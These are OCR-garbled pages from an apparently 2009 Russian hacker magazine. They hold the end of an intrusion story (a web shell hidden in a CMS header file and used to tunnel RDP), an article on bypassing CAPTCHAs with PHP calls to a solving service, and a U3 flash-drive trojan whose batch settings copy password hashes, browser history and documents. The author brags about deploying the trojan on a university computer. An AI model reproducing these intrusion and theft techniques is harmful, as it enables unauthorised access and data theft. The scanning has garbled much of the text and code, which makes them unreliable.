годарный процесс. <tr><t:о>Имя попьзовате"я:</ Ld><t:d><iпрut

Присмотриськ средс­ type="text" size="20" name="login"

теам автоматизации vallle= "вс "></i.nput >< / [д>< / tr>
[или разработайсвой < tr>< td> Т1ароль: </ со><сд>< inptlt Суре'··" сехс "
продукт]. например size= "20/1 Г-.дще= l1password" 'ra1ue=·~ 11 passv.lord" >< /
SIPT ИМХО, прога input></td>c/tr>
часто глючит, работа· А ВОТ И ПОЛЬЗОВАТЕЛИ <tr><td>< /t:d><td><f.nput type=" Sl..\bmi.t"
етоднопоточно,НО value="GO!"></td></td>
сзадачейсправля­ </table>
ется. Читай веткуот Смmpим В консолиSSН-сервераидикорадуемся- есть коннект l </form>
разработчика на ача­ Теперьзапускаем mstsси коннеКI'ИМСЯ на localhost:3390. Нашему
те - fогum.апtiсhаt взорупреДСlclет окно входа Windows 2000. Вводи,пуда данные до­ ЭПИЛОГ, ИЛИ ВСЕ
neUthreadnav24918­ бавленногоспомощью«пеtusегадминистратора»и наслаждаемся ТОЛЬКО НАЧИНАЕТСЯ
1-10.ht.lJJ.!. графикой справамиадминистратера. Ура. можно хлебнуть настоя­ Когда был найден са йт разработчика CMS, руки горели про­
щего рок -н-рольного пойла. то есть виски. и отпраздноватьуспех. веритьего на прочность Ошибка 8СМSбыла натомже месте.
Вополько таблица SM_Sltes содержала одну единственную
ГЛАВА 7, ИЛИ ДАЕШЬ пустую запись, и мечты об FТP не осущеСТ8ИЛИСЬ. Пароли
АВТОМАТИЗАЦИЮ были зашифрованы, и. судя по 13сему. тем самым зловещи,;

На первый взгляд. все за мечательно. но каждый раз заходить IMIS [длина 120 бит] Возиться былоуже неохота. так что мы
на web-shel! и запускать команду на подкл ючен ие по SSH решили оставить это тебе. Ну а чтобы был стимул, вбей в Google
на следующий день стало спишком утомительным Поэтому Iпuгl'паvltеmNumЬег - 12000 записей будут манить тебя и
наикрутейший Со(dFUSlOп-шелл был немного ,;одифицирован ВДОХНО8лятьна подвиги. Доводи любое дело до конца,
для исполнения команды подключения без участия человека. каким бы нереальным это ни казалось. иначе любое твое.

Код модификации шелла смотри на нашем DVD. начинание лишено смысла. Все описанные действия
Кусок кода был заныкан в файл hеаdег.сfm. который, в свою совершены под музыку Брамса \спасибо «_xCort_" с
очередь, подключается кбольшинствуфаЙЛ08 CMS. Далее tОГГ'епts rul. Перефразируя слова бессменного ведущего
создаем простую форму. указы вающую на любой * сfm-файл программы «Дым под водой» Кирилла Немоляева' «Слу­
на серваке. и получае,; простой способ организации RDP. шайте классику и будьте счастливы!».:Х:

~ 052 ХАКЕР 06 /126/ 09

 СОВМЕСТНАЯ АКЦИЯ
ЖУРНАЛА «ХАКЕР» и «КАНЪ

, Or<1ng e
партнеры акции
С Fitness

Сеть профеосионапьных спортивных магазинов КАНТ

.
 ~////л
х S4AVROOW
1 S4AVRDOW@POC.RU 1

О СМОТРИМ

ВЗЛОМ САРТСНА-ФИЛЬТРОВ

Фил ьтры c_aptcha получ ил и широкое расп ространен ие и повсемест­

но используются в многочисленных интернет-сервисах. Но не все

сарtсhа-фильтры одинаковы полезны. Многие из существующих реа­

лизаций себя не оправдывают, а лишь раздражают своим присутстви­
ем обычных пользователей. О недостатках применения сарtсhа-филь­
тров и поидет речь .

• САРТСНА (Сот pletely Auto та ted PlJblic Т uri ng

test to tell Computers and Humans Apart, в про­
интеллекта и философии, а в наше время еще
и нашла применениев борьбе с а8томатизи­
Условно все способы можно разделить на

уязвимости в реализации и фундаментальные

стонародье - «капча»I- полностью автомати­ рованным программнымобеспечением недостатки самой концепции применения

зированный публичный тест Т ьюринга для оп­ В наиболее распространенномварианте сарtсhа-фильтров. К уязвимостям реализации
ределения компьютеров и людей, В основном испол ьзова н и я са ptcha- фильтров требуется относятся следующие распространенные

используется, когда необходимо предотвратить ввести символы, как правило, изображен­ проблемы
выполнение каких-либо автоматизированных ные на предлагаемом рисунке в искаженном I,А8томатизированноераспознавание.Ав­
действий в отнашении инт~рнет-сервисов, виде и обычно - сдобавлением некоторого томатизированное распознавание капчи или

8 частности, для предотвращения автомати­ «шума». Могут также применяться другие задача OCR (оптическое распознавание сим­
ческих отправок сообщ~ний, регистраций, ПЛОХО алгоритмизуемые задачи, основанные воловl- зто одна из самых острых проблем
проведения атак типа подбор пароля и т.п. на логике мышления человека, например: применения captcha-фИЛЬТР08.Дело втом,
Понятие Теста Тыоринга было введено Аланом указать, что изображено на картинке; ввести что во многих случаях существуетвозмож­

М. Т ьюрингом [1912-19541 в работе "Игра в все символы, которые соприкасаются с чем-то ность автоматизированного распозна взния

имитацию». Задача та кого теста - опреде­
лить, обладает ли компьютерная программа
интеллектаl'" или, точнее, может ли она вы­
давать себя за человека. Критерий Тыоринга
описан в виде игры "Имитация». Берется
один мужчина. одна женщина и программа,
(вспоминай кошек на rapldsharel и пр. Как
альтернативз картинкам могут применяться
капчи, основанные на распознаванииречи.
Встречаютсятакже капчи, где предлагается
ввести ответ на простое арифметическое
деikтвие (90 + 72 = ?I.
текста, нанесенного на изображение. Тотже
Adobe Fine Rеаdегс успехом может распоз­
на8ать слабые реализации captcha [смотри
скриншотыl. Различного рода искажения с
добавлением шумов на изображение способ­
ны лишь с некоторым лроцентом успешности

которая, не Иf~ея информации о половой при­
Н'адлежности участн иков, задает им вопросы.
Ее цель - определить ПОЛ людей. Несмотря
на критику этой теории, она внесла большой
вклад в развитие систем искусственного
ПРАКТИКА ОБХОДА
CApteHA-ФИЛЫРО8
Сегодня ИЗ8естно достаточно много способов
обхода различного рода сарtсhа-фильтров
воспрепятствовать этому. Ведь чем более ис­
кажена информация на изображении дЛЯ 8ВО­
да, тем больше проблем возникает у конечного
пользователя. Разработчикам фильтров при­
ходится находить некий компромисс между

~ 054 ХАКЕР 06 /1261 09

 >> 6::лоtv1

около 20 секунд В подобныхусловиях на капчу осуществляется путем сравнения степе­

твердую «четверку» мог отработать вектор по ни похожести с имеющимися экземплярами.

перебору паролей к аккаунтам исследуемой Или более простой случай - если ДЛА картинок
системы .. если бы не одно «НО». Ограничения I-ie используются раЗЛИЧI-iОГО рода искажения

макси­ проекта САРТСНА Killer не позволяют рас­ и добавление шума Тогда просто сверяются

мальным ПОЗl-iавать более 20 изображений в сутки при контрольные суммы, и становится поНятно, с

искажеl-iием использовании одного аккаунта в их системе. каким паРНОКОПЫТI-iЫМ мы имеем дело.

Иl-iформации и Ключевое слово тут - «одного». На сайте про­ 3. Уязвимости при передаче значения капчи

способностьюпользова­ екта существует баг, позволяющий регистри­ в брауэер пользователя_ Какустанавлива­

теля прочитать и ввести значеl-iие за ровать неограl-iиченное количество пользова­ ется соответствие междузначением капчи и

приемлемое количество попыток. телей. При всем уважении к проекту (на сайте генерируемой картинкой? Многие разработчики

На фоне подобного l-iеАОСтатка появилось даже было замечено использование защиты сарtсhа-фильтров почему-то полагают, что
несколько проектов по практическойде­ от CSRF) авторы не стали заморачиваться по вместо некоторого Bl-iутреннего идентификатора

монстрациизадач OCR. Наиболее извес­ поводу разработки стойкой капчи, а просто лучше передавать в браузер пользователя эави­

тные ю них - это UC Berkeley Computer просят при регистрации нового пользователя симоезначение от генерируемой капчи (хеш от
Visiоп Group, PWNtcha и САРТСНА Klller. сложить два числа, которые попадают в сырой генери руемого значен ияl. И впоследствии осу­
Ваш ПОКОРI-iЫЙ слуга, выполняя пентест HTML-KOA. ДЛЯ ,юик целей достаточно было ществлять проверку по зтому значению. Приче'1,

OAI-iОГО банковскогоwеЬ-приложения, имел лишь самого вектора, ноты '10жешь восполь­ порой передача осуществляется G виде откры­

ВОЗМОЖI-iОСТЬ познакомиться с последним зоваться этим недостатком, пра вда, думаю, того текста [то есть Зl-iачение капчи передается,
более близко.
баг довольно быстро прикроют например, какзначение скрытого параметра

Проект САРТСНА Killer заинтересовал, пре­

Чтобы убедиться в эффективности OCR в по­ фОР'1 ы! или существует ВОЗМОЖI-iОСТЬ обратимого
жде всего, тем, что работа с ним основана
левых УСЛОВИАХ, Я провел небольшое исследо­ шифрования передаваемого значения.
на использовании API, и есть возможность
вание в отношении таких сервисов, как Уапdех Иногда реализуемы и более изощренные
легкого встраивания функции по автомати­

зированному взлону капчи в собственные

приложеl-iИЯ. На РНР это выглядит ПрИ'1ер­

но та кс «ПРОЕIКТ САРТСНА IKI LLER ЗАИ НТЕРЕСО­

ВАЛ ТЕМ, ЧТО РАБОТА С НИМ ОСНОВАНА
// l1ереда.ем каnч:у на анализ

$f ields = array·( api_key' =>

I НАИСПОЛЬЗОВАНИИАРI И ЕСТЬ ВОЗМОЖ­
$api_key, 'method' => 'uploa.d_

captcha', I ca.ptс11Э_:"lr1 r =>

НОСТЬЛЕГКОГО ВСТРАИВАНИЯ ФУНКЦИИ
'http://Eon./ ') ;

$fi1es = аггау(ап~ау( 'пате' ПОАВТОМАТИЗИРОВАННОМУВЗЛОМУ

=> 'fiJ.e', 'type' => 'image/
j peg' , ' Ei J.e' => $hash. ' . j pg' ) ) ; КАПЧИ В СОБСТВЕННЫЕ ПРИЛОЖЕНИЯ».
$геБРОnБе = http_parse_
message {11 ttp_pos t_f i е J.ds ( "h t tp: / /
,,,,w\.,. captchaki lJ.ey. сот/ api . pllP" , и Google. Все генер"руемые капчи на ресурсе атаки, направленныена эксплуатациюподоб­
$fie1.ds, $fiJ.es))->Ьоdу; Уапdех распозна ются без особых усил и й. Для I-iОГО типа уязвимости.Для ПРИ'1ера возьмем
Google вектор атаки по распознаванию капчи следующий код, с которым мне довелось
/; i!{ДЕ~4 результата анализа изобра-­ выглядит менее впечатляюще: удается распоз­ встретиться при аудите одного крупного

жеЕ-iИЯ нать только 20% генерируемых изображений. интернет-сервиса:

Sfie1.ds = array ( 'api_key' => Но и этого более чем достаточно, например, для
$api_key, 'met1106, => 'get_ автоматической регистрации новых ящиков
resuJ.t', 'captcha_id' => $captcha_ злектронной ПОЧТЫ.Аесли учесть, что работать тУ $key = int (rand 10000);
id) ; '10ЖНО в несколько потоков ... Другое дело, что шу @БуrnЬо1. s = (, О ' , , ' 9 ' ) ;
$геsропsе = ht ::p_parse_ при такой скорости особо не побрутфорсишь, for ( 1.,,5 ) (
message (rlt tp_pos t_fieJ.ds ( "ht tp: / / но, как говорится, I-ie все же коту масленица $ч . = $symbo1.s [raod @symboJ.sl;
WW"'. captcnaki 1.1. er. сот/ dPl • p11p" , 2.0граниченное количество вариантов изоб­
$fie1.ds, $files) )->body; ражений. Самый яркий пример - это капчи с ту $hasll sha1._hex { uc ($ч), $key
изображениями различной ЖиВI-iОСТИ Недо­ ) ;

статок подобного подхода кроется в том, что

Работа с проектом показала высокую зф­ количество известных оБЫЧН0f1У обывателю

фективность - порядка 80% генерируемых
изображений было распознано безупреч­
но. Ограниченный набор генерируе'1ЫХ на
изображекияхсимволов[использование
только верхнего регистраl позвол"л повысить
зффективность вектора атаки еще на
животных, птиц и прочих существ ограниче­
НО,а это позволяетсформироватьбаэу всех
возможных вариаци й ка РТИI-iОК.
Эксплуатируется вектор достаточно прос­
то Сначала собираются картинки со всеми
10%. доступными изображениями животных. И в
Что тут не так? Ограниченный l-ia60p сим­
волов пр" генерации капчи, слабая «соль»
[salt] и. как следствие - небольшая энтропия
возможныхзначениЙхеша.Ахеш, всвою
очередь. передается в 6раузер пользователя.
Все это позволяет сформировать заранее

На анализ одного изображения тратил ось зависимости от реализации системы, атака cra подготовленные табл ицы соответствия хеша

ХАКЕР О6 112М 09 ~ 055

ПРИМЕРЫ УЯЗВИМЫХ КАПЧ ДЛЯ АВТОМАТИЗИРОВАННОГО РАСПОЗНАВАНИЯ

FLAG CA"•• S
( ! ! Н:О 11111 [ rr н;: 11 tI t I J J
ПРИМЕРЫ САРТСНА, коТОРЫЕ БЫЛИ РАСПОЗНАНЫ
СОТРУДНИКАМИ ИНПИТУТАБЕРКЛИ

к генерируемому значению капчи [rainbow

tablesl. С подобными таблицами любой запрос
сарtсhа-фильтра уже не будет преп~тствием 3 min 56 sec
дл~ програм,mого бота, прогуливающегося по
300 200х70
у~звимомуресурсу

4.Возможноеть повторного ИСПОЛЬЗ0ва­

ни~ Это типичная у~звимоеть не только для
RESULT: intгebec
сарlсhа-фильтров. но и для web-приложений в РАСПОЗНАВАНИЕ КАПЧИ GOOGLE СРЕДСТВАМИ САРТСНА КlLLER
цело,~. Уязвимость включает в себя следую­
щи е недостатки'

• Использование идентификатора сессии без

ввода капчи .
• повторное использование ЗI,ачения капчи
Эксплуатация первого недостатка за кл юча­
ется в TO'~. что человеком вводится значение

caplcha при прохождении аутентификации

в приложении. После чего боту передаетс~ ДАЖЕ ТАКИЕ КАПЧИ УЯЗВИМЫ KOCR
значение идентификаторасессии web-при­

ложения [например. cookiesJ И когда при­ капчи и его идентификатора - и становит­ щеетвляетбесконеЧI'lыеобращени~ к модулю
ложением не осуществл~етс~ мониторинг ся возможным бесп реп~тственно обходить генератора капч и. а второй - осуществляет

действий авторизованного пользователя.
бот сможет беспреп~тетвенно выполнять
свои фУf;КЦИИ.
Повторное использование значения капчи
встречается в двух случаях. В первом
сарtсhа-фильтр Во втором случае проблема
возникает. когда допускаетс~ долгосрочное
хранение сгенерированных, но никем I.,e
испол ьзованных значений сарtсhа-фильтра,
- не и при этом отсутствует какая-либо привязка К
перебор по постоянно'~у диапазону значений
[вспоминай теорию вероятности и поймешь.
почему надо использоВать «постоянный"
диапазон значений). в ситуации. когда набор
символов при генерации значения капчи

производится очистка использованных идентифи катору капчи при проверке его зна­ ограничен [используются, например, только
значений капчи. введен ных пол ьзовател~ми. чения, ЭТО поз.волястпроводить вектор аlаки цифрыl. вектор атаки может быть достаточно
Достаточно получить одно верное значение типа брутфорс. Например. один поток осу­ эффективным!

~ 056 ХАКЕР 06 /126/ 09

 >> взлоt-tt

ПРИМЕРСТОЙКОЙ КАПЧИ KOCR

• Оптическое распоз­
навание с!'!мволов

- это одна из самых

острых п робл е м
пр!'!менения captcha­
фильтров.

• С использованием

ПРИМЕРУЯЗВИМЫХКАПЧ ИСПОЛЬ30ВАНИЕЧЕЛОВЕЧЕСКОГО OCR можно легко

СЖИВНОСТЬЮ РЕСУРСАДЛЯОБХОДАСАРТСНА-ФИЛЬ­ оБХОАИТЬ текущие ре­

ТРОВ ализации САРТСНА

натакихресурсах, как

Уапdех. Google и АР.

5.Взлом капчи, за счет эксплуатации ДРУГИ'Х уяэ­ Идея использованиячеловеческогоресурса в общем
в'имостей Web. Ни Аля кого не секрет, чтозначенl'Я ВИАе ВЫГЛЯАиттак.СОЗАаеТСА некиV. ресурс, Аля которого • "МеТОАлеммингоl3"
капчи в основном хранятся в БД, с которым работает предпопагаетсявысокая посещаемость.Таким ресурсом ста вит под сомнение

web-приложение. Если приложение содержит уязви­ обычно стаНОВИТСR бесплатный порно-сайт, на котором эффе кти В Н ость са­
мость, позволяющую при эксппуатации дотянуться до пользователю предпагается ввести значение капчи в мого ИСПОЛЬЗ0ваНИR

хранимых значений captcha, задача по оБХОАУ ее BBOA<J обмен на просмотр желаемого ропика, Кроме порно-ресур­ са ptcha -фильтров.
будет СВОДИТЬСЯ к простой выборке нужных значений из сов, Аля реализаци!'! ПОАобных целей замечательноПОАОЙ­
соответствующей таблицы БД Например, это реалиэуе­ дет крупная СОЦ!'!альнаясеть. Однако до сих пор социаль­
~,o ПРИ эксплуатации уязвимости типа SOL InjectlOn. На ные сети используются искпючительнодля распознавания

практике мне встречались подобные приложения, В
свое время даже был забавный случай, когда обследуе­
мое web-приложениесодержало вроде бы безобИАНУЮ
уязви~,ость типа пистинг Аиректорий В пространстве
корневой АИ ре пори и we Ь-сервера распола гап!'!с Ь
генерируемые VrЭображения капчи, а в V·MeHax файлов
СОАержал!'!сь!'!х значенv,я. Безусловно, Э1'О единичный
случай, но с учетом повсеместных уязвимостей типа
SOL IПJесtiоп данный вектор более чем применим Аля
обхода ВВОАа капчи Другое дело, будет ли зто 80стре­
бованным в случае, когда приложен!'!е содержит такие
капчи в благих целях Это проектRеСАРТСНА,признанный
помочь в оц!'!фровкетрудно распознавае,щготекста книг
Проект запущен в таких социальныхсетях, как Facebook.
Bash.org ru и АР
ВМЕСТО ЗАКЛЮЧЕНИЯ • ~a cSJ.· <-щ,..lli:9L'юh1L
Надежностьлюбойсистемы безопасности в значительной РWNt<jш
степени зависит от качества ее реализации. У практи­ • captchakiller.com
ческ!'!х решений есть свои недостатки. которые могут • !2.~с_u.гitуlаЬ.г_ш'
быть использованы злоумышленниками В полной мере соп test!239642,phQ.
это правило применимо и к системам, использующим

грубые ошибк!'!. САРТСНА. Поэтому Ааже в очень правильной реализации

К ФУI<Ааментальным проблемам использования captcl1a­ сарtсhа-фильтра испольЗован!'!е только его ОАНОГО может

фильтров ОТНОСИТСЯ воэможность использоваНИА челове­ быть недостаточно. Хорошей практ!'!кой является в до·

ческого ресурса для распознавания капчи ["меТОАлем­ полнение к капче использовать!'! Аругие механизмы, за­

мингов"j. Это замечательный!'!очень эффективный вектор трудняющие автоматизи рованн ые Аействия, На пример,

обхода сарtсl1а-фильтров, которым с момента широкого могут испольэоваться различные временные задержки

распространенияэтой технолог!'!!'! С успехом ПОЛЬЗУЮТСЯ при выполнеНИL1 множеСТ8а ОАНОТИПНЫХ дайствий за

спамеры всего мира и который ставит ПОА сомнение само короткое время, запрос, какой-пибо информации, изеест·
пр!'!менен!'!е сарtсhа-фильтров. ~IОЙ пишь авторизованному пользоватепю L1 др, :::r.:::

ХАКЕР 06 /126/ О9 ~ 057

!
'-=:-> ~з ..... О_М

~ 058

Однажды вечером я сидел дома. почитывая
за кружкой кофе очередной номер журнала
"хакер", и вдруг наткнулс~ на статью про
попытки взлома U3-флешки и софта под нее.
CTaTb~ меня сильно заинтересовала тем, что
флешка была не npocTaR. а буквально золо­
тая. И простор для хакерской деятельности
на ней просто безграничен. Уже через день ~
приступил к опытам и изучению этого инте­
ресне~шего оборудования. Как оказалось. в
caHO~ системе таких флешек существовала
уязвимость, которая потенциально позволя­
ла взломщику сделать инъект в содержимое
защище~IНОГО раздела флешки и заставить
это содержимое ИСПОЛНЯТЬСR на ко;r.пьютере
жертвы. К слову сказать, Большо~ Браттоже
не спит, поэтому все флешки такого типа
перестали попадать к нам на прилавки уже
через 2 недели Сейчас их нет ни в одном
магазине города. Но заказатьтако~ U3-шный
флеш-диск на /" гига в инете нет никаких
nроблемi
ПОРЫ8ШИСЬ в Сети, я не нашел никаких
постов по этой теме и начал сам ковырять
флешку, а именно - пробовал ее скопиро­
вать, разбить, переформатировать, юменить
загрузочную область ... В итоге, все мои
попытки были обречены на провал, пока
мне в руки не попал замечательный nатч от
ХАКЕР 06 /126/ 09
КiпgSlоп, в задачи которого входила nepe­
прошивка моей флешки дл~ совместимости
С Vlsta И именно с его изучеНИR началось
самое интересное
ПОДАРОК ХАКЕРУ­
ПАТЧ ОТ РАЗРАБОТЧИКА
Итак, у нас есть неизвестное приложение.
При запуске оно опрашивает носитель,
копирует данные с него к нам в комп. а после
перепрошивки возвращает все по местам.
Сопровождается этот праздник жизни
всевоз~r.ожными глюками и красивыми
окошками, которые просто инезатейливо
информируют юзера, что ему следует делать
дальше. Пристальное внимание Я обратил
на сам исполн~емый файл. Он заставил
меня улыбнуться. ЭТО незащищенное
Wlnгаг-приложение, имеющее тип саморас­
паковывающегося архива, в котором было
необычное содержимое. Весь взлом состоял
в распакоаке и правке нужных Iпi-файлов
блокнотом Чем дальше ~ изучал их систему
обновлений, тем больше мне зто напоми­
нало приколы из серии «почувствуй себя
кул-хакером". В архиве лежали интерфейс
обновл~лки,функционал.которыЙполучал
доступ кзащищенномудиску и isо-обра­
зы - соответственно, для защищенного
Езлоt·.-1
диска, пустой перегородк., между дисками
и пустой рабочей части Как прин~то в ком­
пании Кlngstоп. все должно быть доступно
дл~ взлома, а это значило, что уже через
1О минут ковыряния в блокноте я создал
корректный файл автозапуска для защищен­
ного диска. Он наnравл~л выполнение кода
сначала на мой обработчик, а затем уже на
файлы LаLJПсhU3-0бработчика итакдалее.
Теперь пора поговорить 05 обработчике и
исполняемом коде, определить концеп­
ции развития и общую структуру постро­
ени~ В качестве языка для написания
систе~~ы я выбрал командную строку
WlпЗ2 Сделал я это по целому p~дy при­
чин, в числе которых - npocToTa изуче­
ния этого языка и легковесность готовых
исполняемых Ьаt-файлов_
НЕПРИСТОЙ~НЫЕ ЗАПРОСЫ
КОМАНДНОИ СТРОКИ
Прежде чем мы полезем вдебри, давай расоr.отрим
основные приколы командного языка и методы об­
хода тех или иных ограничений. Первая проблема,
которая долгосотрясала мой мозг - это обращение
к русско~зычным ПУТRМ В проводнике из пакетного
файла. Если, допустим, с консоли ввести
~ 059
 »

@lf «%pr%»==»disconecCed» @star·t calc&&pause

- то на диске действительно создастся указанная выше @goco т1

папка, но в нашем случае нужен пакетный файл Сле­

довательно, вместо желаемого результата. мы получим в этом коде используютсяпоисковые запросы, выпол­

какую-то кракозябру на неизвестном языке Но все будет ненные в кириллическихсимволах Они всенепременно
прекрасно работать, еслиты пропишешь кодировку 1251 исказятся в какую-то вну'Греннюю кодировку комаНДIЮЙ

строки Чтобы это обойти. выдели нужное тебе слово

~ links chcp 1251 ДМI поиска в окне командной строки исполняющегося
• Это адреса интер­ тд С: \аДНИНИС'l'ратор\ пакетного файла правой кнопкой мыши и вставь в блок­
нет-магазинов, где НОТ. Это может быть буква. строка и прочие символы,
продаются подобные Скажупару слов об использованиивывода строки в своих це­ за исключениемуправляющихсимволов ко;~андной

флешки. Есть экземп­ Л>JХ допустим,ты работаешь с окном командной строки, и тебе строки вроде скобок. Но даже в этом случае ты можешь
ляры на 1,2,4 и вроде надо получитьчисло из ответа Ko,~aHДЫ. Попробуем написать использоватьсинтаКОIС циклов FOR, которым наплевать
быдаже на 16 гиговl программу,ко'Горая мониторитсвязьскомпьютеромпо сети и в на содержи,~ое их переменных, или просто скопирова'Гь

• пlt.JV случае обрыва что-нибудьвыполнит: заранее заготовленные спецсимволы из Apyroro файла.

" digilec.ru Ка к при мер, ищи на OVO мою систему пересоздаНИI1
"lliobiloff.net rem програмна опрашивает заранее известный плейлистов, для построения которых мне необходимо
сервер И результаты пинга связывает с датой и польэоваться тем, что командная строка не пере носит в

• А на iхЫ.согл( временем принципе!

storag~(flashd rives­ Также, из-за чрезмерной обширности вопроса, могу

р17.shtглl, проиаво­ rem # укажите сервер лишь упомянуть о возможности запуска скриптов как в

дился интересный @эес саrgеt=194.67.57.2б режиме ожидания окончания предыдущего, так и в мно­

тест-обзор флешек, в chcp 1251

гопоточном режиме. Не'Г никаких проблем написания
числе кО"Горых оказа­ co1or fD
таких программ, которые при ВЫПОЛliении программиро­

лась и из. t. i t 1 е Блокнотик

вали бы свое потомство, притом, далеко не по линейны,~

chcp 866
алгоритмам Нет проблем и с математикой, матрица"tи
:т1 и прочими полеаными вкусностями. Даже базу данных
состряпать в ней можно без труда, хотя не без I-еморроя.
@set рг=уаr,п=l,б
Всегда К твоим услугам справка Windows по KOMaHiJHov,
@for /F' "usebackq Cokens=l. 2. З, 4,5.6,7*
строке и моя почта. )'1 будутолько рад вопросам, потому
delims= " %%1 IN ('ping %Carget% -п 1')
что хочу расширить доступный мне функционал коман­
DO (echo %%4 %%5 %%6Ifiпdstг 'уа(,п=»&&@
д~ой строки ее же средствами. Считаю использование
set рr=%%б) & (echo %%1 %%2 %%3 %%4 %%5
этого языка хорошим подспорьем для затруднения

%%61 findstr "uа(ули( БV<Е:©. ['J:>®бвгl(, "&&@set

отладки как отдельных программ, так и всей системы 8

pr=disconected)
целом В свое время я писал большой проект. на который
неоднократно покушались другие программисты, но все

@for /F "usebackq tokens=l,2,3* delims==

они, в итоге, нервно курили в сторонке, так и не поняв

" %%1 IN ('echo %clme%') DO@set д_

сути моих екриптов.

r_="Date_%date% time_%%l ping_%pr%» & title

Date_%date% time_%%l ping_%pr% СОЗДАЕМ свой _
с1,; ИСКУССТВЕННЫИ
ФЛЕШ-ИНТЕЛЛЕКТ
@геm ~еспи расконментировать следуюшую На руках у нас - вызов на исполнение защищенного
строчку, то будет создан ЛОЕ на диске цэ файла, который поступил от приложения С защищенного
@rem #@есЬо %d_t 9o » с: \геа1 tiюе_lоg. txt раздела. Сначала мы определим букву диска. на который
@есЬо %d_t% подключилась наша флешка, и откуда ей суждено рабо­
@гет #в случае обрыва по умолчани.ю запускает тать.)'I сделал Э'ГО, используя обычные IF'bI и передал их
калькулятор пара метром в пакетный файл. наход~щийся ~a основном

~ 060 ХАКЕР 06 /126/ 09

 •
>> в::лоt""1

80ТТАКЯ КОГДА-ТО ПИСАЛ RАR-ТРОЯНА

разделе диска "JUMPER,8AT », В нем я определил режим

работы и тактику поведения. Соответственно,Я могу или

ГЛIOКIJ. Е:ЫЯЕ:л€'нные вызвать атакующий модуль, или же, например, открыть

реж>\м хозя>\на-владельцафлешки, в котором играет

Ti?(:TIJp OE:aHUi?tv:I­
музыка, запускается аська и коп>\руютсяЛОГИ со взло­

Изначально система писалась под WindowsXP Ноте, манных машин прямо на мой рабоч>\й стол! Допустим, что
~ warning
но после ее тест>\рования на WiпdоwsХР Рго выяв>\лись флешка попала влапы негодяя Предлагаю расо,отреть

некоторые глюки Напр>\мер, система долго и исправно лишь некоторые моменты файла "WARBOTbat», напр>\­ Вни~,ан>\е! Инфор­
работала на всех компах, пока со мной и "'10>\"'1 товарищем мер, его начальные настройки: мацVlЯ представлена

не случилась следующая история Однажды майским исключительнос целью

днем нам вы пала возможн ость попасть в другой корпус set make_tir_in_allusers_autorun=l - созда­
ознакомления/Ни
POAHOI'O университета и получить доступ к компьютеру, вать ли Трояна в а.втозагрузке всех пользова­
автор, н и редакц",яза

через который так или иначе проходят все методички, телей (0\1)
твои действияответе­

дипломные работы и вкусности, на которых можно было set make_tir_in_user_autorun=l - создавать

твенност>\не несутl

бы неплохо навар>\ться. Пр>\дя в корпус, Я передал при­ ли Трояна в автозагрузке текущего лользо:вате­

ятелю флешку, после чего мы пошли «на дело» Сначала ля (0\1)

меня. как сейчас помню, He~'HOГO озадачила надпись set stealth_konsol=O - копировать ли с КОМ­

Windows2000 на з кране мон итора, но уже через м гнове­ пьютера жеР'ЕВЫ файлы консопей управления?

ние флешка весело и бодро м>\гала своей лампочкой В (0\1)

гнезде USB, Флешка не захотела атаковать компьютер, set stealth_histiry_ie=l - копировать ли ис­

>\ Р.. недолго ду~,ая, 8руб>\л принуд>\тельную атаку, Время ,"орию посещения 6раузера ТЕ? (0\1)

шло, флешка работала, а мы выполняли собственно то, set attack_for_guest=l - производить ли атаку

зачем нас направили в зтототдел. После окончаниР. на гостя? (0\1)

На дискетебяожидает
работы мы с нетерпен>\ем вернул>\сь в родные корпуса set stealth recents=l - копировать ли ярлыки
моя "ега-сVlстема,

О да I Флешка сработала чудесно! По сещ МЫ прон>\кли в недавно ОТКрЫТЫХ документов? {иногда ПОНQга­
а также все необхо­
одну из самых защищенных ~ышин и с кайфом БГлядыва­ ет «осмотреться») (0\1)
димые материалы,

лись В действительно интересные фотографи>\ сотрудн>\ц set stealth_system_info=l - копировать ли

касающиеся всех

отдела. И так продолжалось до самого обрыва связи. «Ну, лаги со счетчиков системы и значения перемен­
аспектов разработки
ничего - завтра все скоп>\руем», - сказал Я товарищу, >\ ных? (0\1)
подобныхприложе­

мы пошли подомам. На следующееутро моего друга под­ set steal th_md5--I>asswords=1 - nЫ'Т'аться ли
НИЙ,скриптован>\я

няли по тревоге - надо было срочно явиться в l'ОТ отдел, скопировать мд5-хеши паролей с системы? (О \1)
под WiпЗ2 и прочие
чтобы подправ>\ть какие-то поля. ПОЧуЯ8 неладное. мы set type_of_file_for_stealth=.doc . txt ­
вкусности.описанные

подключились к вузовской сети и стали пытаться зайти на указывает файлы, которые ДОЛЖНЫ быть сграбле­ в статье Тебе остается
тот компьютер НаС>Кдал облом - компьютер п>\нговался. ны с компьютера на флешку лишь взять и УЛОЖVlть

но не отвечал. Сильно озадаченные ~Ш пошли в другой set type_of_file_for_filtration=.lnk .LnK предоставленныйма­

корпус .lnp3 .WПlа .уоЬ .wav .mid .midi .тр4 . avi .ogg териал по папочкам.

Придя, ~Ш наблюдали следующую картину. компьютер, .mpeg .mpg .cda %usbdisc% winword WINWORD
возле него несколько человек. Они смотрел>\ на нас

.&.
глазами маньяков. которые давно никого неубивали. На

Е: HOMi?p!
8се последующие 80ПрОСЫ мы сделали лица кирп>\чом и

стали нести ну просто полную ах"нею про интернет, его

CPO'iHO
раЗ8итие и вирусы Нас выслушали и поверил",. Когда
мы спросили, а что же случилось, нам рассказали, что Совсем недавно стало известно, что можно сделать чу­
умашины внезапно слетели все пароли. Они вызвали до-флешку из любого накоп>\теля, Теперь не обязатель­

(
местного сисад~,ина, который добрых три часа возился с
таблич~ой ввода пароля, и. видимо, совсем отчаявш",сь,
но по купать дорогую UЗ-флешку - сойдет даже трЗ­
плеерl Универсальный софт для ~ЮДVlфикации флешек,
наугад ввел ",мя пользователя "Гость» И нажал «Enter» загруженный с сайта liltp:l/flashhoot.ru/irrdex.php?nam
Система неожиданнопорадовала его не тол ько успеш­ e~Files&op=cat&id=6&раgепum=2,я заботливозалил
ным входом, но >\ админск",ми полномочиями в пр",дачу. на диск. Как его юзать - разберешься в рамках моего
Вонакие пирог>\. домашнего задания ;1. Или п",ши на почту - помогу.

ХАКЕР 06 11261 09 ~ 061

 -­

е; EKplorc drive 1:

8 Settings»

..if) Add Progr.ams »

е Help and Support »
~='----I~U3;;:_=:А;::':::....,:=.=.'~..:сyOU=.-;_;:;.:-;~:с.~bneI;·:;--,1
Iгtroduc~ to YCU n!!Nf uэ Sl"nart drive.

~ ЕпаЫе Security

I a::rngston U3 (enter

,..-~ ------,
\ ~ Dow.1load Pragrams )
-----.".,==с"

..
